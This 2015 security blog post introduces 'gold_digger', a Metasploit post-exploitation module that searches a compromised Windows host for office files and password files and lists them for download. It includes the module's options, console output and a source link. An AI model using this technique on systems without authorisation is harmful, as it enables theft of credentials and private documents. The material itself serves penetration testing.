Monday, February 16, 2015

My GoldDigger Script


Awhile back I created a post module that would index various types of file types so I could more quickly find and decide if i wanted to do download potentially useful files.

I like to look for the passwords.txt/passwords.xls/passwords.doc in addition to other configuration files. Finding and reviewing these can be a bit tedious on the command line.

The script is based on the enum_files  post module and it will let you pick the extensions you are interested in as well as which drive to search. Instead of just downloading all those files it creates two output files per file type (in loot). One file that is easy to read and a second that is easy to cut in paste into your meterpreter console to download any files you find interesting.

msf use post/windows/gather/gold_digger
msf post(gold_digger) > info

       Name: Windows Gather Generic File Collection
     Module: post/windows/gather/gold_digger
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  3vi1john
  RageLtMan
  CG

Description:
  This module looks for all office files, creates a list and the path
  to those files to download later if you want (check your loot
  folder). Based on enum_files.rb. Creates two output files in loot.
  one with the raw path and second that is more readable. Notes: Does
  not decend into Users\$user\AppData by default (not sure why). You
  have to force that directory with the SEARCH_FROM option.


msf post(gold_digger) > show options

Module options (post/windows/gather/gold_digger):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   FILE_GLOBS   *.doc*,*.xls*,*.ppt*,*.pdf  yes       The file pattern to search for in a filename
   SEARCH_FROM                              no        Search from a specific location. Ex. C:\
   SESSION                                  yes       The session to run this module on.


In action:


[*] Searching C:\Users\ for *.doc* through windows user profile structure
[*] Found C:\Users\user\Documents\Derbycon3.docx adding to the list
[*] Found C:\Users\user\Documents\Speaker Attachments.docx adding to the list
[*] Found C:\Users\user\Desktop\runroute.doc adding to the list
...

[*] Searching C:\Users\ for *.xls* through windows user profile structure
[*] Found C:\Users\user\Documents\servers.xlsx adding to the list

...

[*] Searching C:\Users\ for *.pdf* through windows user profile structure
[*] Found C:\Users\user\Desktop\scan.pdf adding to the list
...
[*] Done!
[*] Post module execution completed


Of course you can also give it full drives like C:\\ or X:\\ or change extensions you are looking for.

You can get it here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/post/windows/gather/gold_digger.rb

CG

2 comments:

Jaime Chiquita said...

Maybe the access to the directory must be accepted only with privileges for the current user manipulation of the files.

CG said...

i assume you mean the appdata folder. if you manually set it, i think it will index if for you, just doesnt descend into it.